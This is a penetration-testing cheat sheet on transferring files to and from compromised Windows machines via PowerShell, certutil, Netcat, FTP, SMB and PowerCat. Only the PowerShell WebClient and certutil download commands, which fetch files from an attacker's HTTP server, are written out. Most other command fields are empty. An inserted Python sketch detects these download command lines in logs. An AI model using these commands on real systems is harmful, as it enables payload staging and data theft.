Windows

Uploading Files to Victims in Windows

1. PowerShell Download File

PowerShell provides a built-in method for downloading files directly from a remote web server.

Attacking Machine Command:

python3 -m http.server 8080

Victim Machine Command:

powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://10.10.10.1:8080/FileToTransfer','C:\Users\test\Desktop\FileToTransfer')"

Explanation: The attacking machine sets up a simple HTTP server using Python, and the victim machine downloads the file using PowerShell’s WebClient object.

2. Certutil

Certutil is a built-in Windows utility that can be leveraged to download files, which may bypass certain security mechanisms that are in place.

Attacking Machine Command:

python3 -m http.server 8080

Victim Machine Command:

certutil.exe -urlcache -split -f http://10.10.10.10:8080/FileToTransfer FileToTransfer

Explanation: The attacker runs a Python HTTP server, and the victim machine uses certutil to download the file.

3. PowerShell IWR (Invoke-WebRequest)

Invoke-WebRequest can be used in PowerShell to download files, similar to wget in Linux.

Attacking Machine Command:

Victim Machine Command:

Explanation: The attacker sets up an HTTP server, and the victim uses PowerShell’s iwr command to download and save the file locally.
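
Detection view: the three HTTP download techniques above each leave a recognizable process command line in process-creation logs. The Python sketch below is an added example, not part of the original page. The rule names, host names and sample events are constructed, and the Invoke-WebRequest line using -OutFile is an assumed form because the page does not show that command.

```python
import re

# Rules are case-insensitive because cmd.exe and PowerShell ignore case.
RULES = [
    ("powershell-webclient",
     re.compile(r"Net\.WebClient\b.*\.DownloadFile\s*\(", re.I)),
    # certutil accepts "-" or "/" before an option, in any order.
    ("certutil-urlcache",
     re.compile(r"\bcertutil(\.exe)?\b(?=.*[-/]urlcache\b).*https?://", re.I)),
    # PowerShell accepts unambiguous parameter prefixes, so -OutF == -OutFile.
    ("powershell-iwr",
     re.compile(r"\b(Invoke-WebRequest|iwr)\b(?=.*\s-OutF)", re.I)),
]
URL = re.compile(r"https?://[^\s'\"]+", re.I)


def classify(cmdline):
    """Return (technique, url) for a download-style command line, else None."""
    for name, rx in RULES:
        if rx.search(cmdline):
            m = URL.search(cmdline)
            return name, (m.group(0) if m else None)
    return None


def hunt(events):
    """events: iterable of (host, cmdline) pairs from process-creation logs."""
    hits = []
    for host, cmdline in events:
        verdict = classify(cmdline)
        if verdict:
            hits.append((host, *verdict))
    return hits


# Constructed sample events: four downloads and two benign command lines.
SAMPLE = [
    ("ws01", r'''powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://10.10.10.1:8080/FileToTransfer','C:\Users\test\Desktop\FileToTransfer')"'''),
    ("ws02", "certutil.exe -urlcache -split -f http://10.10.10.10:8080/FileToTransfer FileToTransfer"),
    ("ws03", "CERTUTIL /URLCACHE /f http://10.10.10.10:8080/FileToTransfer out.bin"),
    ("ws04", "powershell.exe iwr -Uri http://10.10.10.1:8080/FileToTransfer -OutFile FileToTransfer"),
    ("ws05", r"certutil.exe -hashfile C:\Users\test\Desktop\report.docx SHA256"),
    ("ws06", r'powershell.exe -c "Get-ChildItem C:\Users\test\Desktop"'),
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE):
        print(hit)
```

The benign certutil hash and directory listing lines are not flagged, which shows the rules key on the download options rather than on the binary name alone.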

4. Netcat

Netcat can be used for transferring files to a victim machine by establishing a network connection.

Victim Machine Command:

Attacking Machine Command:

Explanation: The victim machine listens on port 4444 for incoming data, and the attacker sends the file over to it using nc.

5. FTP

FTP can be used to transfer files between systems. Here’s how to do it using a simple FTP server.

Attacking Machine Command:

Victim Machine Command:

Explanation: The attacker runs an FTP server using twistd, and the victim machine connects to it to download the file.

6. SMB

SMB is commonly used for file sharing in Windows environments. This command allows for transferring files over the SMB protocol.

Attacking Machine Command:

Victim Machine Command:

Explanation: The attacker sets up an SMB server using impacket-smbserver, and the victim copies the file from the SMB share.


Downloading Files from Victims in Windows

1. Netcat

Netcat can be used to receive files from a victim machine by listening on a port.

Attacking Machine Command:

Victim Machine Command:

Explanation: The attacker listens on port 4444 for incoming data and receives it from the victim using nc.

2. FTP

FTP can also be used to upload files from the victim machine to the attacker’s machine.

Attacking Machine Command:

Victim Machine Command:

Explanation: The attacker runs an FTP server, and the victim machine uploads the file using FTP commands.

3. SMB

SMB is also useful for downloading files from the victim machine back to the attacker’s system.

Attacking Machine Command:

Victim Machine Command:

Explanation: The attacker sets up an SMB server and the victim machine retrieves the file from the SMB share.

4. PowerCat

PowerCat is a PowerShell-based tool used for networking. It can be used for file transfers in a similar manner to Netcat.

Victim Machine Command:

Attacking Machine Command:

Explanation: The attacker listens on port 4444 for incoming data, and the victim machine uses PowerCat to send the file back over to the attacker.

